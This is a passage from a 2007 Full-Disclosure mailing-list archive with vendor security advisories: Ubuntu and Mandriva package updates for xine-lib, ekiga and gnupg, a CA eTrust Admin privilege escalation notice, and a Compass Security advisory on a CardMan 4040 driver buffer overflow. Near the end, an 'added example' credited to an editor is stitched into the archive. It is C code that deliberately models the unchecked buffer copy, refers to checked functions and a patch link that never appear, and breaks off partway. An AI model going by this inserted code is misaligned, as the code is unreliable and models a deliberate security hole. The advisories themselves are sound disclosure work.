      Size/MD5:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_amd64.deb
      Size/MD5:   109296 92a59b50d859f12affc42fee457ed93f
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_amd64.deb
      Size/MD5:  3611908 9e6f2c0dad7b1050a71d1f29d3537ec1

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_i386.deb
      Size/MD5:   109306 3224a1a8c0c259b90add235d58d10a7a
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_i386.deb
      Size/MD5:  4005002 81fd17d5eabfa12a3dea0d9c8fd79d7f

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_powerpc.deb
      Size/MD5:   109320 eb1a5685b7288b8cc9ef6ae09d422aec
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_powerpc.deb
      Size/MD5:  3850506 7801ba1b96b888c38b4e72f8fb4ccee1

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_sparc.deb
      Size/MD5:   109312 22805f01c94ced268bd12cf951447af4
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_sparc.deb
      Size/MD5:  3695682 e0fbc0aa0791685943a5094ea6519b2d

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.6.diff.gz
      Size/MD5:    19845 149027147eff0f72e1d0af9faa0cd6cf
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.6.dsc
      Size/MD5:     1113 6fdbc64e22ad7511a80cba1ea840b534
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz
      Size/MD5:  6099365 5d0f3988e4d95f6af6f3caf2130ee992

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_amd64.deb
      Size/MD5:   115856 6146578aeeecdf61742b90dca3a97155
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_amd64.deb
      Size/MD5:  2615268 a6cff8bccebfbe51d7b3a6916d9250b1

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_i386.deb
      Size/MD5:   115852 6b404dc405aefcac89ec3eec339f25a0
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_i386.deb
      Size/MD5:  2934402 ea3a45814952437ac9f792cf1e7586b3

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_powerpc.deb
      Size/MD5:   115860 1484daaeb0459a88c1760a1330397e52
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_powerpc.deb
      Size/MD5:  2724986 889c6b454382dd63cd89020c87faf547

  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_sparc.deb
      Size/MD5:   115860 b43491e3060c813b3530664cca2acd30
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_sparc.deb
      Size/MD5:  2591802 1e116a509bfd2b93588c48f665b78055

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.3.diff.gz
      Size/MD5:    71537 8eb0120c16f4a7fa6a104906b453f51a
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.3.dsc
      Size/MD5:     1445 0a0fb0af663abf737e59cb67099e45ef
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1.orig.tar.gz
      Size/MD5:  4583422 9c05a6397838e4e2e9c419e898e4b930

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine-main1_1.1.2+repacked1-0ubuntu3.3_all.deb
      Size/MD5:    39034 4df368ac302eb48b666e8324529fa056

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_amd64.deb
      Size/MD5:   118968 17df05fc2764c33e4ba5615cf8962c2a
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_amd64.deb
      Size/MD5:  3442878 b4a5d4fc2bcd737cf0b63d8d3a1ad4b1
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_amd64.deb
      Size/MD5:  2914566 91c324fe56add73266c33cbf38bc4536

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_i386.deb
      Size/MD5:   118966 7c3bf270fba86dee9af4830cf36f41c8
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_i386.deb
      Size/MD5:  3772104 b85545a9e2aa6b60165d4bd76c8057d3
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_i386.deb
      Size/MD5:  3222286 14d569c60f5ffcd329ff5d9069ede6d9

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_powerpc.deb
      Size/MD5:   118974 a43b661831de4510c30f1c0b96bbfa66
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_powerpc.deb
      Size/MD5:  3469556 e27b2c49a649493bc9a93919475af667
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_powerpc.deb
      Size/MD5:  3043210 a4cca521e0eff186d3c19a6c96eba3ce

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_sparc.deb
      Size/MD5:   118978 c993d877a95c8e0a48d610b4883cf9e2
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_sparc.deb
      Size/MD5:  3136598 57d6199ddad2e55bb5d7c0673c7ed5a2
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_sparc.deb
      Size/MD5:  2857016 c79d6bac788a4c0fe262ada727b42c60

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/b1c56f47/attachment.bin

From James.Williams at ca.com Fri Mar 9 02:59:23 2007
From: James.Williams at ca.com (Williams, James K)
Date: Thu, 8 Mar 2007 21:59:23 -0500
Subject: [Full-disclosure] [CAID 35145]: CA eTrust Admin Privilege Escalation Vulnerability
Message-ID: <649CDCB56C88AA458EFF2CBF494B6204025C4EC1@USILMS12.ca.com>

Title: [CAID 35145]: CA eTrust Admin Privilege Escalation Vulnerability

CA Vuln ID (CAID): 35145

CA Advisory Date: 2007-03-08

Impact: Attackers can gain escalated privileges.

Summary: The CA eTrust Admin GINA component contains a privilege escalation vulnerability within the reset password interface.
Mitigating Factors: This vulnerability is exploitable only through physical interactive access or through Remote Desktop.

Severity: CA has given this vulnerability a Medium risk rating.

Affected Products:
eTrust Admin 8.1 SP2 (8.1.2)
eTrust Admin 8.1 SP1 (8.1.1)
eTrust Admin 8.1 (8.1.0)

Affected Platforms:
Windows

Status and Recommendation:
CA has issued an update to correct the vulnerability. Two update options are available for CA eTrust Admin 8.1 SP2 (8.1.2), 8.1 SP1 (8.1.1), 8.1 (8.1.0):

1. Uninstall GINA and install 8.1 SP2 CR6 or later.

Or

2. Manually replace the affected cube.exe executable with the fixed cube.exe executable from the 8.1 SP2 CR6 Manual Updates zip file. The fixed cube.exe file has a date of February 11, 2007 and a file size of 53,248 bytes.

Both updates can be found at the eTrust Admin Solutions and Patches page:
http://supportconnectw.ca.com/public/etrust/etrustadmin-dmo/downloads/etrustadmin-updates.asp

Workaround:
If patch application is not feasible at this time, ensure that Remote Desktop is disabled and restrict physical host access to reduce exposure.

How to determine if the installation is affected:
1. Using Windows Explorer, locate the file "cube.exe". By default, the file is located in the "C:\Program Files\CA\eTrust Admin GINA Option" directory.
2. Right click on the file and select Properties.
3. Select the General tab.
The installation is vulnerable if the creation date of cube.exe is earlier than February 11, 2007.
References (URLs may wrap):

CA SupportConnect:
http://supportconnect.ca.com/

CA SupportConnect security notice for this vulnerability:
Security Notice for CA eTrust Admin GINA
http://supportconnectw.ca.com/public/etrust/etrustadmin-dmo/infodocs/etrust_secnot_gina.asp

CA Security Advisor posting:
CA eTrust Admin Privilege Escalation Vulnerability
http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=101038

CAID: 35145
CAID advisory link:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=35145

CVE Reference: CVE-2007-1345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1345

OSVDB Reference: OSVDB ID: 32722
http://osvdb.org/32722

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza. Islandia, NY 11749
Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright (c) 2007 CA. All rights reserved.
From kees at ubuntu.com Fri Mar 9 04:24:37 2007
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 8 Mar 2007 20:24:37 -0800
Subject: [Full-disclosure] [USN-434-1] Ekiga vulnerability
Message-ID: <20070309042437.GS6805@outflux.net>

===========================================================
Ubuntu Security Notice USN-434-1             March 09, 2007
ekiga, gnomemeeting vulnerability
CVE-2007-0999
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  gnomemeeting                    1.2.2-1ubuntu1.2

Ubuntu 6.06 LTS:
  ekiga                           2.0.1-0ubuntu6.2

Ubuntu 6.10:
  ekiga                           2.0.3-0ubuntu3.2

After a standard system upgrade you need to restart Ekiga or reboot your computer to effect the necessary changes.

Details follow:

It was discovered that Ekiga had format string vulnerabilities beyond those fixed in USN-426-1. If a user was running Ekiga and listening for incoming calls, a remote attacker could send a crafted call request, and execute arbitrary code with the user's privileges.
Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2.diff.gz
      Size/MD5:    13935 390ded46c12911e6ff7f0fb0b41648b1
    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2.dsc
      Size/MD5:     1811 bfaea7c58d0be1c76fb15275584929d8
    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2.orig.tar.gz
      Size/MD5:  6059950 65fe2d6a31e63a37c5a6217206223192

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_amd64.deb
      Size/MD5:  1826502 ab68c7c0c54d6ea2288058f1cd850e0a

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_i386.deb
      Size/MD5:  1802224 2323471938830841421f5758518444a0

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_powerpc.deb
      Size/MD5:  1817578 61f4574c015fb133a7d223d68945ad87

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_sparc.deb
      Size/MD5:  1803946 ab636f2081b328f36025e99cea2f0cd3

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2.diff.gz
      Size/MD5:    26736 820ab04b4cb0423bb9d62f03bf3e4634
    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2.dsc
      Size/MD5:     2090 921caa6df4e1ceeb79438b5f653992c6
    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1.orig.tar.gz
      Size/MD5:  5572709 9f0a2bcce380677e38b23991320df171

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_amd64.deb
      Size/MD5:  3687974 428c44b190d3e1e6f97f8d3be08aa6fe

  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_i386.deb
      Size/MD5:  3658256 2b4c80838f881af9780e65e5be79b26b

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_powerpc.deb
      Size/MD5:  3673874 44119593cb37df9ae0c759df26e9f5b3

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_sparc.deb
      Size/MD5:  3661004 85ce6c1bc136e1e6699cfb501d537abd

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2.diff.gz
      Size/MD5:    27205 ae82839a944aa39b118b1fa6edda3f1c
    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2.dsc
      Size/MD5:     1837 90fa46619ab136f7e8d7086916c1bdc0
    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3.orig.tar.gz
      Size/MD5:  5749938 5ad3458d73d65c6502c312ff0c430a7c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_amd64.deb
      Size/MD5:  3689026 82e52fe078d8ab0102bf647d12cfe4cc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_i386.deb
      Size/MD5:  3668638 4ebd1951ef9e4cc4860223e682c90541

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_powerpc.deb
      Size/MD5:  3676386 efcac25a055bb4cd5e776550c370880f

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_sparc.deb
      Size/MD5:  3671020 41fda4e546004b1a7f456b286e2ce560

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/34ebbc69/attachment.bin

From security at mandriva.com Fri Mar 9 04:34:49 2007
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 08 Mar 2007 21:34:49 -0700
Subject: [Full-disclosure] [ MDKSA-2007:058 ] - Updated ekiga packages fix string vulnerabilities.
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:058
http://www.mandriva.com/security/
_______________________________________________________________________

Package : ekiga
Date    : March 8, 2007
Affected: 2007.0
_______________________________________________________________________

Problem Description:

A format string flaw was discovered in how ekiga processes certain messages, which could permit a remote attacker that can connect to ekiga to potentially execute arbitrary code with the privileges of the user running ekiga. This is similar to the previous CVE-2007-1006, but the original evaluation/patches were incomplete.

Updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0999
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.0:
f1864ecddf6bd6f89ca97ae2f62e102a  2007.0/i586/ekiga-2.0.3-1.2mdv2007.0.i586.rpm
6553d806ec25e8e7b3bf954d0522f126  2007.0/SRPMS/ekiga-2.0.3-1.2mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
d1044e6da6359f45c05b5b9633eb9b3e  2007.0/x86_64/ekiga-2.0.3-1.2mdv2007.0.x86_64.rpm
6553d806ec25e8e7b3bf954d0522f126  2007.0/SRPMS/ekiga-2.0.3-1.2mdv2007.0.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi.
The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF8LmWmqjQ0CJFipgRAoxqAKCGqGz5vPwbGLM8dIhVGu3aTC/0pQCZAZ5t
4tj/XeqT0NKpu3t3MRu8tYs=
=bmdD
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Mar 9 04:53:11 2007
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 08 Mar 2007 21:53:11 -0700
Subject: [Full-disclosure] [ MDKSA-2007:059 ] - Updated gnupg packages provide enhanced forgery detection
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:059
http://www.mandriva.com/security/
_______________________________________________________________________

Package : gnupg
Date    : March 8, 2007
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

GnuPG prior to 1.4.7 and GPGME prior to 1.1.4, when run from the command line, did not visually distinguish signed and unsigned portions of OpenPGP messages with multiple components. This could allow a remote attacker to forge the contents of an email message without detection.

GnuPG 1.4.7 is being provided with this update and GPGME has been patched on Mandriva 2007.0 to provide better visual notification on these types of forgeries.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1263
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2006.0:
ec697754fca080fa53c6c486cd91ba8c  2006.0/i586/gnupg-1.4.7-0.2.20060mdk.i586.rpm
f30ab12655598264c10cee92ed76c951  2006.0/SRPMS/gnupg-1.4.7-0.2.20060mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
845bfd1f359b7866e73ab2eb8b30b8fe  2006.0/x86_64/gnupg-1.4.7-0.2.20060mdk.x86_64.rpm
f30ab12655598264c10cee92ed76c951  2006.0/SRPMS/gnupg-1.4.7-0.2.20060mdk.src.rpm

Mandriva Linux 2007.0:
c1b40e8866482c368aab5df228093ab3  2007.0/i586/gnupg-1.4.7-0.2mdv2007.0.i586.rpm
9dbf1a7a48aecb2ece048b47f4c7ade9  2007.0/i586/libgpgme11-1.1.2-2.1mdv2007.0.i586.rpm
3809f32ed3708606e6318fb7feed230d  2007.0/i586/libgpgme11-devel-1.1.2-2.1mdv2007.0.i586.rpm
62d991ccd15ca77ed37ccd4ca1bedba7  2007.0/SRPMS/gnupg-1.4.7-0.2mdv2007.0.src.rpm
31357e977acd83d777df2d77c22094f6  2007.0/SRPMS/gpgme-1.1.2-2.1mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
d5339dd2bc4146dd18c2ab3b4eca028d  2007.0/x86_64/gnupg-1.4.7-0.2mdv2007.0.x86_64.rpm
608bd0a86d6f83927466f23e7d73fa8d  2007.0/x86_64/lib64gpgme11-1.1.2-2.1mdv2007.0.x86_64.rpm
915d2d203fa41ce12bc661d1a89d563b  2007.0/x86_64/lib64gpgme11-devel-1.1.2-2.1mdv2007.0.x86_64.rpm
62d991ccd15ca77ed37ccd4ca1bedba7  2007.0/SRPMS/gnupg-1.4.7-0.2mdv2007.0.src.rpm
31357e977acd83d777df2d77c22094f6  2007.0/SRPMS/gpgme-1.1.2-2.1mdv2007.0.src.rpm

Corporate 3.0:
36afcf2ffb12348fccdfba01b485d7fc  corporate/3.0/i586/gnupg-1.4.7-0.2.C30mdk.i586.rpm
ec3c9d7bf56e941e2f92a92caa8ac812  corporate/3.0/SRPMS/gnupg-1.4.7-0.2.C30mdk.src.rpm

Corporate 3.0/X86_64:
250e2ef0d26f6d51aa175e32c04e29d0  corporate/3.0/x86_64/gnupg-1.4.7-0.2.C30mdk.x86_64.rpm
ec3c9d7bf56e941e2f92a92caa8ac812  corporate/3.0/SRPMS/gnupg-1.4.7-0.2.C30mdk.src.rpm

Corporate 4.0:
e39b79ee6122b17eaefa4abb7eec8d05  corporate/4.0/i586/gnupg-1.4.7-0.2.20060mlcs4.i586.rpm
16926c5d72457c65d89124c1ebd7d0b9  corporate/4.0/SRPMS/gnupg-1.4.7-0.2.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
810b054fed4d7c0b2c8605bb7c3efdca  corporate/4.0/x86_64/gnupg-1.4.7-0.2.20060mlcs4.x86_64.rpm
16926c5d72457c65d89124c1ebd7d0b9  corporate/4.0/SRPMS/gnupg-1.4.7-0.2.20060mlcs4.src.rpm

Multi Network Firewall 2.0:
014a4338ad09dca79149509a1a0a2050  mnf/2.0/i586/gnupg-1.4.7-0.3.M20mdk.i586.rpm
d513a1498ccd2ee5661fb6a9e80c5230  mnf/2.0/SRPMS/gnupg-1.4.7-0.3.M20mdk.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF8LvpmqjQ0CJFipgRAk5yAJ4mihFJrRV8cInt9tK3IOogC6wB3gCgjW0c
eMLhgVvm4msQrd936ApOrYE=
=vufo
-----END PGP SIGNATURE-----

From i.m.crazy.frog at gmail.com Fri Mar 9 05:10:59 2007
From: i.m.crazy.frog at gmail.com (crazy frog crazy frog)
Date: Fri, 9 Mar 2007 10:40:59 +0530
Subject: [Full-disclosure] Good resources on Web 2.0
In-Reply-To: <5e01c29a0703081838i1eda7c21q203e34f35f17786a@mail.gmail.com>
References: <5e01c29a0703081838i1eda7c21q203e34f35f17786a@mail.gmail.com>
Message-ID: <41011d980703082110y79a5a053ub71b2b26d70115e0@mail.gmail.com>

secgeeks.com
cgisecurity.com
webappsec.com
securityfocus.com
www.plynt.com

On 3/9/07, Michael Silk wrote:
> On 3/9/07, Justin Boem wrote:
> >
> > List,
> >
> > I am looking for some good resources on Web 2.0 and Security. I know this
> > is a huge topic, but any references to good books, articles, websites,
> > tools, etc would be great
> >
> "web 2.0" security is the same as any other type of web security. the same
> principles apply.
>
> > Thanks
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> --
> mike
> 00110001 <3 00110111
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
---------------------------------------
http://www.secgeeks.com
get a blog on secgeeks :)
register here:- http://secgeeks.com/user/register
rss feeds :- http://secgeeks.com/node/feed
Submit your security articles, send them to secgeek at secgeeks.com
http://www.newskicks.com
Submit and kick for new stories from all around the world.
---------------------------------------

From daniel.roethlisberger at csnc.ch Fri Mar 9 09:16:40 2007
From: daniel.roethlisberger at csnc.ch (Daniel Roethlisberger)
Date: Fri, 9 Mar 2007 10:16:40 +0100
Subject: [Full-disclosure] Buffer Overflow in Linux Drivers for Omnikey CardMan 4040 (CVE-2007-0005)
Message-ID: <20070309091640.GA23453@dragon.roe.ch>

#############################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
#############################################################
#
# Product:  Linux Driver for Omnikey CardMan 4040
# Vendor:   Omnikey GmbH / Harald Welte
# Subject:  Buffer Overflow
# Risk:     Medium
# Effect:   Locally exploitable
# Author:   Daniel Roethlisberger (daniel.roethlisberger at csnc.ch)
# Date:     2007-03-07
# CVE Name: CVE-2007-0005
#
#############################################################

Introduction:
-------------

The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain a buffer overflow vulnerability. Local attackers with direct or indirect write permissions to a cmx device file can execute arbitrary code with kernel privileges or may cause denial of service.

Vulnerable:
-----------

* Linux 2.4/2.6 cm4040 drivers by Omnikey:
  - cm4040 v1.1.0
  - cm4040 v1.2.0
  - cm4040 v2.0.0
* Linux 2.6 cm4040 drivers by Harald Welte, as included in:
  - Linux 2.6.15 ... 2.6.20.1

Not vulnerable:
---------------

* Linux 2.4/2.6 cm4040 drivers by Omnikey:
  - cm4040 v1.0.0
* FreeBSD cmx driver by Daniel Roethlisberger

Not tested:
-----------

* Other Linux driver versions
* Drivers for MacOS X, Windows

Technical Description:
----------------------

While using the Linux drivers for the CM4040 as a reference for writing a cmx FreeBSD driver, Compass Security has discovered two buffer overflows in the Linux drivers. One of them in the write() and another one in the read() handler.
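The flaw pattern behind both handlers, modelled in userland as an added example (editor's code, not Compass's PoC, not the cm4040 driver source and not the lkml patch the advisory links to): a fixed staging buffer of the 512 bytes the advisory names, a write path that copies whatever length the caller passes, and the length check that closes the hole, applied to the read path as well because a length announced by the device is untrusted input too. The names (`cmx_write_unchecked`, `cmx_write_checked`, `cmx_read_checked`, `RW_BUFFER_SIZE`), the guard bytes standing in for whatever follows the buffer in the real driver, and the error codes are assumptions for the demonstration; the one deviation from a real unchecked copy is that the "unchecked" model clamps to its own array so the demo process cannot corrupt its own memory.

```c
/* Added example: userland model of a character-device write/read path with a
 * fixed staging buffer. Not the cm4040 driver's code; names, sizes and error
 * codes are assumptions for the demonstration. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define RW_BUFFER_SIZE 512   /* staging buffer size (advisory: 512 bytes) */
#define GUARD_SIZE     16    /* stands in for whatever sits after the buffer */
#define GUARD_BYTE     0xA5

/* Simulated driver state. Buffer and guard share one flat array so that an
 * overrun in the unchecked model stays inside this array and is observable. */
struct cmx_dev {
    unsigned char mem[RW_BUFFER_SIZE + GUARD_SIZE];
};

void cmx_dev_init(struct cmx_dev *dev) {
    memset(dev->mem, 0, RW_BUFFER_SIZE);
    memset(dev->mem + RW_BUFFER_SIZE, GUARD_BYTE, GUARD_SIZE);
}

/* Returns 1 if the bytes after the staging buffer are untouched. */
int cmx_guard_intact(const struct cmx_dev *dev) {
    for (size_t i = 0; i < GUARD_SIZE; i++)
        if (dev->mem[RW_BUFFER_SIZE + i] != GUARD_BYTE)
            return 0;
    return 1;
}

/* The flaw pattern: the caller's length is trusted and copied as-is into a
 * 512-byte buffer. Clamped to the model's array only so the demo stays safe. */
ssize_t cmx_write_unchecked(struct cmx_dev *dev, const unsigned char *src, size_t count) {
    if (count > sizeof(dev->mem))
        count = sizeof(dev->mem);
    memcpy(dev->mem, src, count);
    return (ssize_t)count;
}

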